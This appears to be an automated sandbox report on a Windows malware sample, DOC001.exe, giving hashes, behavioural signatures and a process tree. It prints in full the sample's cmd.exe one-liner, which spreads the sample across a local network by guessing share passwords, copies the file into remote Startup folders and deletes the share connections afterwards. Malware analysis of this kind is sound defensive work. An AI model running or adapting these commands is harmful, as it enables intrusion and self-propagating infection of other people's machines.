Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-12-2024 22:40

General

  • Target

    DOC001.exe

  • Size

    1.1MB

  • MD5

    c720ac483a5752c2b69945a8ad673162

  • SHA1

    a91be77fa1bc117c34b3e652706e3b276b487769

  • SHA256

    856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78

  • SHA512

    68f7cde69539fa53692c358aa439a52e73ef9628427f3c9a3b310f71ec107d7dc6dc1a19323cad728b6ed6912eb0bf52e618c6097a1069e5d493b10e699ede82

  • SSDEEP

    12288:hhczyLe1sGZ7Bg5uPRwr05vzSBwepQZ2XcCDsceWiJklfViHen3wUN4uZycTWKCg:hE7ZtIvezxepQ4sGscezCPHN0QQRq4U

Malware Config

Signatures

  • Indicator Removal: Network Share Connection Removal 1 TTPs 4 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempts to gather information on the host's network.

  • Network Share Discovery 1 TTPs

    Attempts to gather information on the host network.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 16 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Discovers systems in the same network 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DOC001.exe
    "C:\Users\Admin\AppData\Local\Temp\DOC001.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4892
    • C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe
      "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1404
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
        3⤵
        • Indicator Removal: Network Share Connection Removal
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
          4⤵
          • Network Service Discovery
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\SysWOW64\net.exe
            net view
            5⤵
            • System Location Discovery: System Language Discovery
            • Discovers systems in the same network
            PID:3696
          • C:\Windows\SysWOW64\find.exe
            find /i "\\"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4948
          • C:\Windows\SysWOW64\ARP.EXE
            arp -a
            5⤵
            • Network Service Discovery
            • System Location Discovery: System Language Discovery
            PID:3632
          • C:\Windows\SysWOW64\find.exe
            find /i " 1"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c set str_
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3740
          • C:\Windows\SysWOW64\net.exe
            net view \\10.127.255.255
            5⤵
            • System Location Discovery: System Language Discovery
            • Discovers systems in the same network
            PID:4800
          • C:\Windows\SysWOW64\find.exe
            find /i " "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4744
        • C:\Windows\SysWOW64\net.exe
          net use * /delete /y
          4⤵
          • Indicator Removal: Network Share Connection Removal
          • System Location Discovery: System Language Discovery
          PID:4740
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1792
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1852
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • Enumerates system info in registry
          PID:3808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1236
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:632
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ /delete /y
          4⤵
          • Indicator Removal: Network Share Connection Removal
          • System Location Discovery: System Language Discovery
          PID:3636
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 20 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4440
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5024
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3448
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3908
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users /delete /y
          4⤵
          • Indicator Removal: Network Share Connection Removal
          • System Location Discovery: System Language Discovery
          PID:4560
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 20 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4996
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1880
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ """" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:348
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users """" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2888
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4236
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3900
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4008
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:536
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3188
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1564
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3340
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ "123" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4188
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users "123" /user:"1"
          4⤵
            PID:4820
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4380
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "0" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4128
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "0" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2004
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3080
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ """" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1536
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users """" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3944
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:5092
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1476
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:576
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1724
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "1" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2852
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "1" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1556
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4368
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "123" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4340
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "123" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3176
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1852
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "0" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1984
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "0" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4892
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2920
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ """" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2564
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users """" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2956
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2392
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "administrator" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4632
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "administrator" /user:"administrator"
            4⤵
            PID:444
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2212
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "1" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:648

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nssB269.tmp\inetc.dll

    Filesize

    21KB

    MD5

    d7a3fa6a6c738b4a3c40d5602af20b08

    SHA1

    34fc75d97f640609cb6cadb001da2cb2c0b3538a

    SHA256

    67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

    SHA512

    75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

  • C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe

    Filesize

    1.1MB

    MD5

    c720ac483a5752c2b69945a8ad673162

    SHA1

    a91be77fa1bc117c34b3e652706e3b276b487769

    SHA256

    856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78

    SHA512

    68f7cde69539fa53692c358aa439a52e73ef9628427f3c9a3b310f71ec107d7dc6dc1a19323cad728b6ed6912eb0bf52e618c6097a1069e5d493b10e699ede82